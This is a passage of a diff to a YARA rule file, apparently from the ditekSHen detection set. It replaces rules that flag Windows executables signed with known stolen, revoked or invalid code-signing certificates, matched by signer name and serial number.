 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		hash = "083d5efb4da09432a206cb7fba5cef2c82dd6cc080015fe69c2b36e71bca6c89"
-		logic_hash = "3d4d84a60095e608fbd774f2b3a0f86e32dd9fe25801da06ee10188425a029e0"
+		logic_hash = "2b440d21183745ac89de56f5ca22cf3f01be3212e20ce80fa67a45adbb6b16fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "97b7602ed71480756cf6e4658a107f8278a48096"
+		thumbprint = "7239764d40118fc1574a0af77a34e369971ddf6d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Creator Soft Limited" and pe.signatures [ i ] . serial == "0c:ed:87:bd:70:b0:92:cb:93:b1:82:fa:c3:26:55:f6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "INFINITE PROGRAMMING LIMITED" and pe.signatures [ i ] . serial == "4e:8d:4f:c7:d9:f3:8a:ca:11:69:fb:f8:ef:2a:af:50" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_1Afd1491D52F89Ba41Fa6C0281Bb9716 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_09830675Eb483E265C3153F0A77C3De9 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "a0e5569f-7895-519b-9c1b-9cea3126391f"
+		id = "3370886e-6866-598b-b3bf-29c7f2537425"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5513-L5524"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L328-L339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "071895cc37527aa634410dc79bf1656068e4c2b9f61d24912160c5f847e154f9"
+		logic_hash = "b0a504ed2a2816602ac378a700567909812650f409626a7b2c1e25cf7f8cb51c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e4362228dd69c25c1d4ba528549fa00845a8dc24"
+		thumbprint = "1bb5503a2e1043616b915c4fce156c34304505d6"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TestCert" and pe.signatures [ i ] . serial == "1a:fd:14:91:d5:2f:89:ba:41:fa:6c:02:81:bb:97:16" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "James LTH d.o.o." and pe.signatures [ i ] . serial == "09:83:06:75:eb:48:3e:26:5c:31:53:f0:a7:7c:3d:e9" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_719Ac44966D05762Ef95245Eefcf3046 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_351Fe2Efdc0Ac56A0C822Cf8 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e215971c-67f0-5fdb-9525-7aef2559674f"
+		id = "dcd82e7a-f235-5ff6-805b-0da7e0c0e385"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5526-L5537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L341-L352"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2b7c5ccc7a09d3917cf8625bc3e78526ba9620eb8bb08490124c24a5c2eda629"
+		logic_hash = "a661adcd9366da7eab0aa8059bbe6236022f7513996603eb06c43a0b38ff4b85"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "57ecdfa48ed03a5a8177887090b3d1ffaf124846"
+		thumbprint = "4230bca4b7e4744058a7bb6e355346ff0bbeb26f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "jZQtQDMvyDRzWsoVFeitFmeNcWMtKauvidXSUrSEwqmi" and pe.signatures [ i ] . serial == "71:9a:c4:49:66:d0:57:62:ef:95:24:5e:ef:cf:30:46" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logika OOO" and pe.signatures [ i ] . serial == "35:1f:e2:ef:dc:0a:c5:6a:0c:82:2c:f8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_008Fe807310D98357A59382090634B93F0 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_07Bb6A9D1C642C5973C16D5353B17Ca4 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "bf4326b3-a838-5dff-a6e1-ac71c6fb871d"
+		id = "a29590bb-d8f9-5842-81bd-f9a9f7cea642"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5539-L5550"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L354-L365"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a90430a6f07f67ead37e5cba9f0baee92551511a9f33a2a1fd3d2419322aaa8b"
+		logic_hash = "faecdcd78bc60f730bfe5a049fd0bd1309b44d185c0cbc81dfc326a162d5fcb2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "acd6cf38d03c355ddb84b96a7365bfc1738a0ec5"
+		thumbprint = "9de562e98a5928866ffc581b794edfbc249a2a07"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MADAS d.o.o." and pe.signatures [ i ] . serial == "07:bb:6a:9d:1c:64:2c:59:73:c1:6d:53:53:b1:7c:a4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00801689896Ed339237464A41A2900A969 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_044E05Bb1A01A1Cbb50Cfb6Cd24E5D6B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "91cecd18-0007-59a4-94f3-bdaa06b25822"
+		id = "e8dc8963-29c1-5306-bd7d-80ad9e1334d9"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5552-L5563"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L367-L378"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9dc505e00e0085587aee2bf2e70db04850e11d057b8d16e31e8caebb130e047b"
+		logic_hash = "c433b63f9c875a564f424ecc8e9239701ce8be78cd0046c1eefca8cf732abca3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9b0ab2e7f3514f6372d14b1f7f963c155b18bd24"
+		thumbprint = "149b7bbe88d4754f2900c88516ce97be605553ff"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GLG Rental ApS" and pe.signatures [ i ] . serial == "00:80:16:89:89:6e:d3:39:23:74:64:a4:1a:29:00:a9:69" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MUSTER PLUS SP Z O O" and pe.signatures [ i ] . serial == "04:4e:05:bb:1a:01:a1:cb:b5:0c:fb:6c:d2:4e:5d:6b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Podangers : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0C14B611A44A1Bae0E8C7581651845B6 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b394c4a1-1614-578f-bbfc-6eb9998b4a06"
+		id = "a6ebe304-e896-5cb3-8a49-ebffe0525601"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5565-L5576"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L380-L391"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6a041e8ae4a7a1af59b81799b5c014691e347c8305266adeffd9d49337712b2e"
+		logic_hash = "dae6318cf6f8e33e11af5c4b06379f8ef2744e784bb793c78f782b6a6286b84b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6e757c3b91d75d58b5230c27a2fcc01bfe5fe60f"
+		thumbprint = "c3288c7fbb01214c8f2dc3172c3f5c48f300cb8b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PODANGERS" and pe.signatures [ i ] . serial == "00" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E9A1E07314Bc2F2D51818454B63E5829 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0B1926A5E8Ae50A0Efa504F005F93869 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2c9f0497-0fcd-591c-be72-e92464b689f3"
+		id = "905a4b5c-3255-5f53-be54-429038378ee0"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5578-L5589"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L393-L404"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e3dfb75350bcdbb6861612f2f6cc757724260f99e4024df2b20c7b273bc50266"
+		logic_hash = "78d507f76d44ed982d12c293604d5c4fed14316cbc18473b7131bb89997bad28"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3a146f3c0fc17b9df14bd127ebf12b15a5a1a011"
+		thumbprint = "2052ed19dcb0e3dfff71d217be27fc5a11c0f0d4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "iWLiYpLtpOlZYGmysAZkhz" and pe.signatures [ i ] . serial == "00:e9:a1:e0:73:14:bc:2f:2d:51:81:84:54:b6:3e:58:29" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Nordkod LLC" and pe.signatures [ i ] . serial == "0b:19:26:a5:e8:ae:50:a0:ef:a5:04:f0:05:f9:38:69" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_9D915138Acdac1A044Afa6E5D99567C5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Bab6A2Aa84B495D9E554A4C42C0126D : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "89182dfb-b100-573c-85ae-38bdf7f24a64"
+		id = "be364465-0cab-59cd-82a2-b7b16f260f34"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5591-L5602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L406-L417"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "32fb0d12a9b61461104e29571fcc7210f7ea8a82a8e240c747a0070d8d43a9b0"
+		logic_hash = "a9ecdf1107cba0767ac3fa52c7dd65a13015e4fd735da70b6f1e6dbcfe2f7526"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4f8b9ce0e25810d1b62d8c016607de128beba2a1"
+		thumbprint = "230614366ddac05c9120a852058c24fa89972535"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AAAruntest" and pe.signatures [ i ] . serial == "9d:91:51:38:ac:da:c1:a0:44:af:a6:e5:d9:95:67:c5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NOSOV SP Z O O" and pe.signatures [ i ] . serial == "0b:ab:6a:2a:a8:4b:49:5d:9e:55:4a:4c:42:c0:12:6d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_11A9Bf6B2Dcbc683475B431A1C79133E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_066226Cf6A4D8Ae1100961A0C5404Ff9 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "9c49f529-330f-5d37-b613-e45aad50afcb"
+		id = "75db8056-a5da-5db4-a837-84c5cc05f0fc"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5604-L5615"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L419-L430"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fa424180e60d2fde2fce085d0c848c5b33bcc58c2ca54f327f446ff5cf361fe2"
+		logic_hash = "0b7fa450d143de99650d0364e461178ad4e0b147b19dae53b59928b2a17c9b6d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "7412b3f5ba689967a5b46e6ef5dc5e9b9de3917d"
+		thumbprint = "8c762918a58ebccb1713720c405088743c0d6d20"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BINDOX" and pe.signatures [ i ] . serial == "11:a9:bf:6b:2d:cb:c6:83:47:5b:43:1a:1c:79:13:3e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEP" and pe.signatures [ i ] . serial == "06:62:26:cf:6a:4d:8a:e1:10:09:61:a0:c5:40:4f:f9" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3Fd3661533Eef209153C9Afec3Ba4D8A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0E96837Dbe5F4548547203919B96Ac27 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d47bc223-f29e-54d3-a452-064f89fa80f7"
+		id = "83258afe-66e0-56d1-8361-125a1142ffe4"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5617-L5628"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L432-L443"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e9662abf4c70d54fc719850ef216352fd59a559726fbad5db9e265660400b432"
+		logic_hash = "2eedcc1d782df3c078c20a275680c2ff724e5b7675890af1335ff22d6138ab25"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "20ddd23f53e1ac49926335ec3e685a515ab49252"
+		thumbprint = "d6c6a0a4a57af645c9cad90b57c696ad9ad9fcf9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SFB Regnskabsservice ApS" and pe.signatures [ i ] . serial == "3f:d3:66:15:33:ee:f2:09:15:3c:9a:fe:c3:ba:4d:8a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN CORP PTY LTD" and pe.signatures [ i ] . serial == "0e:96:83:7d:be:5f:45:48:54:72:03:91:9b:96:ac:27" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2Ba40F65086686Dd4Ab7171E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5B320A2F46C99C1Ba1357Bee : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "13909741-cba3-5143-86eb-bcc227cfaa9c"
+		id = "376aab03-0bc7-5993-bbbd-9bf5b742d29d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5630-L5641"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L445-L456"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8ed65c0b5d231be9dbbe34da493087d1bf83cf21c401435fed7e2851acdb6f60"
+		logic_hash = "b0a515aa69b5de58cf7d1a496f95038e090cefe511803e7a29332b411a20d19f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "842f81869c2f4f2ba2a7e6513501166e2679108a"
+		thumbprint = "5ae8bd51ffa8e82f8f3d8297c4f9caf5e30f425a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RITEIL SISTEMS LLC" and pe.signatures [ i ] . serial == "2b:a4:0f:65:08:66:86:dd:4a:b7:17:1e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_67144B9Ed89Fb2D106D0233873C6E35F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_02C5351936Abe405Ac760228A40387E8 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f9806e55-9efa-504a-b27c-d3418fc5cd38"
+		id = "32e200c3-678f-5be4-b55b-2a7a32e56843"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5643-L5654"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L458-L469"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9d3c39c590a75b3ea1d1f699bea279c0c68498e51e2ab7f4ad3e3f8857d6d668"
+		logic_hash = "ae9e428c5e7c1ab67be291da93e6d3fa694e3a9b347672817cbf1cac44837a04"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5971faead4c86bf72e6ab36efc0376d4abfffeda"
+		thumbprint = "1174c2affb0a364c1b7a231168cfdda5989c04c5"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Infosignal LLC" and pe.signatures [ i ] . serial == "67:14:4b:9e:d8:9f:b2:d1:06:d0:23:38:73:c6:e3:5f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ca4822E6905Aa4Fca9E28523F04F14A3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_08D4352185317271C1Cec9D05C279Af7 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "713f84b3-b09a-5fcf-85ed-899be9f14b84"
+		id = "a0197037-874c-55e7-80aa-e8b7156a26a3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5656-L5667"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L471-L482"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6e0d7abd82805019c6b1c9df2479489bbd3fe7a4a1703971c02324072692b1e5"
+		logic_hash = "6f4b8a52e152097a6e18f55b6b677eb1ba0f4da78ce68ffa35510bfb485e01e9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "35ced9662401f10fa92282e062a8b5588e0c674d"
+		thumbprint = "52fe4ecd6c925e89068fee38f1b9a669a70f8bab"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ELISTREID, OOO" and pe.signatures [ i ] . serial == "00:ca:48:22:e6:90:5a:a4:fc:a9:e2:85:23:f0:4f:14:a3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Retalit LLC" and pe.signatures [ i ] . serial == "08:d4:35:21:85:31:72:71:c1:ce:c9:d0:5c:27:9a:f7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3769815A97A8Fb411E005282B37878E3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ed8Ade5D73B73Dade6943D557Ff87E5 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "da41e9a7-1660-5157-9148-f2f774df647a"
+		id = "ebdab290-d388-528e-b392-0ae87941b69d"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5669-L5680"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L484-L495"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "ccd548ebe2be2c7b44e6c39df50ffea4703d0b1decd78cc6fb4b3bbf9d85be0b"
+		logic_hash = "e2e269a83a86567bf359996945cddc597406033aa7c5a7acf30b58d30816b28f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c80fd3259af331743e35a2197f5f57061654860c"
+		thumbprint = "9bbd8476bf8b62be738437af628d525895a2c9c9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Yandex" and pe.signatures [ i ] . serial == "37:69:81:5a:97:a8:fb:41:1e:00:52:82:b3:78:78:e3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rumikon LLC" and pe.signatures [ i ] . serial == "0e:d8:ad:e5:d7:3b:73:da:de:69:43:d5:57:ff:87:e5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3B007314844B114C61Bc156A0609A286 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ed1847A2Ae5D71Def1E833Fddd33D38 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "bb68c2fc-2389-5fb8-96f0-5731f008fd3c"
+		id = "5e09087b-3fd0-5979-8f98-f242231c8b4f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5682-L5693"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L497-L508"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f6f4e551a9be96f43a81e4da69f7b312dbdc16da17659a00a3486543a9c078e9"
+		logic_hash = "2acc6d2262bac8bfe49bb244d62be4dcf626dd9b2c9786b7a8963c48b17e6ab9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "52ae9fdda7416553ab696388b66f645e07e753cd"
+		thumbprint = "e611a7d4cd6bb8650e1e670567ac99d0bf24b3e8"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURDAY CITY LIMITED" and pe.signatures [ i ] . serial == "3b:00:73:14:84:4b:11:4c:61:bc:15:6a:06:09:a2:86" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SNAB-RESURS, OOO" and pe.signatures [ i ] . serial == "0e:d1:84:7a:2a:e5:d7:1d:ef:1e:83:3f:dd:d3:3d:38" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_262Ca7Ae19D688138E75932832B18F9D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0292C7D574132Ba5C0441D1C7Ffcb805 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "891717e4-502f-5820-903c-3d9f2751a9d3"
+		id = "0792bf83-c0e9-55f8-b6bd-b05bc575e2b4"
 		date = "2020-11-19"
 		modified = "2024-10-04"
